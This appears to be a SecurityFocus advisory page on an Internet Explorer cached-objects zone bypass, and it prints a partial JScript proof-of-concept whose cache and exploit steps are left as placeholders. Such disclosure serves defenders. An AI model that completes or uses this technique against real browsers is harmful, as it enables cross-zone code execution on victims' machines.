Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Multiple Microsoft Internet Explorer Cached Objects Zone Bypass Vulnerability

The following proof of concept was provided:

<script language="jscript">
var oWin=open("blank.html","victim","width=100,height=100");
[Cache line here]
location.href="http://google.com";
setTimeout(
function () {
[Exploit line(s) here]
},
3000
);
</script>







 

Privacy Statement
Copyright 2008, SecurityFocus